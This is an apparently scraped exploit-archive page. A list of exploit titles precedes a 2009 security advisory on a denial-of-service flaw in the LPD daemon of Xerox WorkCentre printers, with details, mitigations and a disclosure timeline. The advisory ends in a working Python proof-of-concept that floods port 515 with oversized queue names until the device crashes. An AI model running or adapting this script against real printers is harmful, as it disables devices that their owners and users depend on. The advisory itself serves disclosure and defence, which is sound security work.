477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
183 lines
6.7 KiB
Python
Executable file
183 lines
6.7 KiB
Python
Executable file
# Louhi Networks Information Security Research
|
|
# Security Advisory
|
|
#
|
|
#
|
|
# Advisory: Xerox WorkCentre multiple models Denial of Service
|
|
# Release Date: 2009/08/25
|
|
# Last Modified: 2009/08/25
|
|
# Authors: Juho Ranta
|
|
# [juho.ranta@louhi.fi]
|
|
# Henri Lindberg, CISA
|
|
# [henri.lindberg@louhi.fi]
|
|
#
|
|
# Application: Xerox WorkCentre
|
|
# Verified: Controller+PS ROM Version 1.202.1 and 1.202.5
|
|
# Devices: Xerox WorkCentre 7132,
|
|
# WC7232/7242, WC7328/7335/7345/7346 and
|
|
# WC7425/28/35
|
|
# Attack type: Denial of Service
|
|
# Risk: Low
|
|
# Vendor Status: Patch available for WC7232/7242
|
|
# References: http://www.louhinetworks.fi/advisory/xerox_0908.txt
|
|
#
|
|
# http://www.cert.fi/haavoittuvuudet/2009/haavoittuvuus-2009-081.html
|
|
#
|
|
# http://www.support.xerox.com/go/results.asp?Xtype=download&prodID=WC7232_WC7242&Xlang=en_US&Xcntry=USA
|
|
#
|
|
#
|
|
# Overview
|
|
#
|
|
# Quote from http://www.xerox.com/
|
|
# "The Xerox WorkCentre 7132 multifunction is the affordable transition
|
|
# to the next level of productivity for your office. One easy-to-use
|
|
# device offers powerful printing, copying, scanning, and faxing. The
|
|
# WorkCentre 7132 also gives you color when you need it, for critical
|
|
# documents and for added impact. Robust functions, straightforward
|
|
# operation, and color within your budget . that should keep everyone
|
|
# smiling and productive."
|
|
#
|
|
# During a brief assessment performed for Xerox WorkCentre 7132 it was
|
|
# discovered that LPD daemon implementation contains a weakness
|
|
# related to robustness of LPD protocol handling. Attacker can crash
|
|
# the whole device with a relatively simple attack. Recovering from
|
|
# the denial-of-service condition requires power cycling the device.
|
|
#
|
|
# Details
|
|
#
|
|
# Device freezes when it is flooded with LPD requests having oversized
|
|
# queue name length AND other features of the device are accessed
|
|
# during the attack.
|
|
#
|
|
# The LPD daemon terminates the connection when it receives a request
|
|
# with an oversized queue name. The required minimum length for this
|
|
# seems to vary. Our proof-of-concept attack sends ASCII character
|
|
# blocks to the LPD daemon until connection is closed, while sending
|
|
# HTTP requests to the web administration interface.
|
|
#
|
|
# By flooding the device with these invalid LPD requests and accessing
|
|
# other features at the same time, the device can be crashed. This was
|
|
# verified with two different firmware versions (1.202.1 and 1.202.5).
|
|
#
|
|
# It must be noted that successful denial-of-service attack requires
|
|
# the steps described above. Sending requests with oversized queue
|
|
# names does crash the device by itself.
|
|
#
|
|
# Due to the black box nature of the performed attack against a
|
|
# production device, we were not able to determine the exact root
|
|
# cause for the crash. According to vendor this is caused by a memory
|
|
# leak, but further exploitability or memory corruption has neither
|
|
# been confirmed nor denied.
|
|
#
|
|
# Vulnerability was detected with an LPD protocol implementation
|
|
# written for Sulley Fuzzing Framework.
|
|
#
|
|
#
|
|
# Preconditions
|
|
#
|
|
# *LPD daemon is enabled.
|
|
# *Attacker has network access to the LPD daemon
|
|
# *Attacker has network access to other features OR
|
|
# *Valid user uses the device on location
|
|
#
|
|
#
|
|
# Symptoms of successful attack
|
|
#
|
|
# One or more of the following:
|
|
# *Control panel lights are blinking, no response to pushing buttons
|
|
# *LCD panel displays error message
|
|
# *LCD panel displays a halted progress bar
|
|
# *Switching power off from on/off button takes more than 10 seconds
|
|
#
|
|
# Proof of Concept:
|
|
#
|
|
# Python code available at:
|
|
# http://www.louhinetworks.fi/advisory/xerox/exploit.py
|
|
# http://www.louhinetworks.fi/advisory/xerox/webInterface.py
|
|
#
|
|
# Pictures of a crashed control panel (Finnish language):
|
|
# http://www.louhinetworks.fi/advisory/xerox/error1.jpg
|
|
# http://www.louhinetworks.fi/advisory/xerox/freeze1.jpg
|
|
#
|
|
# Web interface requests are performed with a separate Python
|
|
# process/script in order to achieve more reliable exploitation under
|
|
# Windows.
|
|
#
|
|
# Mitigation:
|
|
#
|
|
# Preventive
|
|
# *Install patch from vendor
|
|
# *Configure IPS signature for LPD requests with oversized queue
|
|
# names
|
|
# *Allow only trusted users to access LPD daemon
|
|
# *Disable LPD daemon
|
|
#
|
|
# Detective
|
|
# *Configure IDS signature for LPD requests with oversized queue
|
|
# names
|
|
#
|
|
# Disclosure Timeline (selected dates):
|
|
#
|
|
# X 2008 - Vulnerability discovered
|
|
# 3. September 2008 - Contacted CERT-FI by email describing the
|
|
# issue with Xerox WC 7132
|
|
# 20. November 2008 - CERT-FI confirms vendor has been notified
|
|
# 21. January 2009 - Vendor is unable to reproduce the issue,
|
|
# but continues trying
|
|
# 22. January 2009 - Vulnerability reproduced, vendor investigates
|
|
# other devices. Apologizes slow response.
|
|
# 17. June 2009 - Vendor has identified vulnerable devices,
|
|
# patch due in July.
|
|
# 20. August 2009 - Patch available for download (only
|
|
# WC7232/7242)
|
|
# 25. August 2009 - Advisory released
|
|
#
|
|
# A Big Thank You to CERT-FI's Vulnerability Coordination for persistent
|
|
# coordination effort.
|
|
#
|
|
# Copyright 2009 Louhi Networks Oy. All rights reserved. No warranties,
|
|
# no liabilities, information provided 'as is' for educational purposes.
|
|
# Reproduction allowed as long as credit is given. Information wants to
|
|
# be free.
|
|
|
|
import socket
|
|
import sys
|
|
import os
|
|
import httplib
|
|
import signal
|
|
|
|
if len(sys.argv) < 2:
|
|
print("Usage: python exploit.py printerIpAddress")
|
|
print("After the script is started, execute the webInterface.py script")
|
|
sys.exit(0)
|
|
|
|
ipAddress = sys.argv[1]
|
|
|
|
|
|
i = 0
|
|
|
|
while True:
|
|
i += 1
|
|
try:
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
s.connect((ipAddress, 515))
|
|
|
|
except:
|
|
# If the connection fails, printer has crashed
|
|
print("Unable to connect")
|
|
sys.exit(0)
|
|
|
|
# Send receive a printer job -command. Queue name will be as long as
|
|
# possible. The printer will disconnect when the queue name has reached it's
|
|
# maximum length
|
|
s.send("\x02")
|
|
j = 0
|
|
while True:
|
|
j += 1
|
|
s.send("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
|
|
print(str(i) + "." + str(j))
|
|
|
|
s.close()
|
|
|
|
print(i)
|
|
|
|
# milw0rm.com [2009-08-25]
|